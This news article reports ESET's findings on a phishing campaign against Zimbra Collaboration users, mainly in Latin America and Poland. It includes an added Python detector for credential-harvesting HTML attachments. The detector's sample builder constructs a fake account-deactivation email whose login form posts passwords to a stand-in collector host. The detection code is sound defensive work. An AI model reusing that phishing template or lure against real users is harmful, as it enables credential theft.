Massive Phishing Campaign Targets Latin American Countries: ESET

Photo by: Mohamed Hassan, Pixabay
By Tomás Lujambio | Journalist & Industry Analyst - Mon, 08/21/2023 - 16:15

In recent months, collaborative software platform Zimbra Collaboration has become the target of a significant phishing campaign aimed at extracting users' sensitive information. According to findings by ESET, this phishing campaign, which commenced in April 2023, has predominantly impacted small and medium-sized enterprises (SMEs), as well as government entities. If successful, this cyberattack has the potential to infiltrate the ranks of approximately 200,000 businesses relying on Zimbra's services across the world.

“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries,” says Viktor Šperka, Cybersecurity Researcher, ESET. The platform's attractiveness to cybercriminals is partly due to the expectation that organizations with tighter IT budgets are more susceptible to cybersecurity breaches. 

ESET's analysis reveals that the phishing campaign has cast its net over multiple countries in Latin America and the EU, with Poland experiencing the highest number of attacks, followed by Ecuador and Italy. While the identity of the hacking group responsible for these assaults remains undisclosed, its actions have significantly impacted businesses throughout Latin America. Notably, Ecuador, Mexico, Argentina, Chile, Peru and Brazil have recorded the highest number of cyberthreat attempts in recent months.

The phishing operation kicks off with an innocuous-looking email, often adorned with urgent subject lines such as server updates or account deactivation warnings. The attacker goes to great lengths to impersonate email server administrators, further luring victims into their trap. Finally, users are prompted to click on an HTML attachment, serving as the entry point for the attack.

Upon opening the attachment, victims encounter a meticulously forged Zimbra login page, tailored to mimic their organization's branding. Because this fake page opens within the victim's web browser, it can appear authentic, even though the URL points to a local file path. Once the victim inputs their credentials into the falsified HTML form, the attacker extracts this information. The credentials are then transmitted via an HTTPS POST request to the attacker's server, completing the cyberattack cycle.
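The pattern described above (an HTML attachment whose form collects a password and posts it to a remote server) can be checked for at the mail gateway. The following is an added example, not code from ESET or Zimbra; the function names, the sample message and the `collector.example.invalid` host are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class CredentialFormFinder(HTMLParser):
    """Records the action URL of each form that has a password field and posts off-host."""
    def __init__(self):
        super().__init__()
        self.action = ""   # action of the <form> currently open
        self.hits = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            # An absolute http(s) action means the credentials leave the local file.
            if urlparse(self.action).scheme in ("http", "https") and self.action not in self.hits:
                self.hits.append(self.action)

    def handle_endtag(self, tag):
        if tag == "form":
            self.action = ""

def scan_message(raw: bytes) -> list:
    """Return (filename, form action) for each HTML attachment with a remote credential form."""
    findings = []
    msg = message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):   # HTML sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        finder = CredentialFormFinder()
        finder.feed(body)
        findings += [(name, action) for action in finder.hits]
    return findings

def build_sample(action: str = "https://collector.example.invalid/p") -> bytes:
    """Constructed sample message: an 'account deactivation' notice with an HTML attachment."""
    msg = EmailMessage()
    msg["Subject"] = "Account deactivation notice"
    msg.set_content("Open the attached file to keep your account active.")
    html = (f'<html><body><form method="post" action="{action}">'
            '<input name="username"><input type="password" name="password"></form></body></html>')
    msg.add_attachment(html, subtype="html", filename="notice.html")
    return msg.as_bytes()
```

A form that submits through script rather than an `action` attribute would not be caught by this check and needs separate handling.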

Notably, this campaign does not discriminate based on industry verticals. Apparently, the sole common thread among victims is their reliance on Zimbra's software. However, the campaign's effectiveness underscores the deficiency in cybersecurity awareness within organizations across the world. Stanford studies show that 85% of all data breaches are caused by an employee mistake, substantially increasing the probability of suffering from phishing cyberattacks.

The Zimbra phishing campaign serves as a reminder that even reputable platforms are not immune to exploitation. Organizations within Mexico, for example, should promote information sharing, educate their employees about phishing threats and implement robust security measures to safeguard against such insidious attacks. By proactively addressing the vulnerabilities within the nation's digital infrastructure and cultivating a culture of cybersecurity resilience, Mexico can mitigate the risks posed by evolving cyberthreats and emerge as a more secure and resilient digital ecosystem.
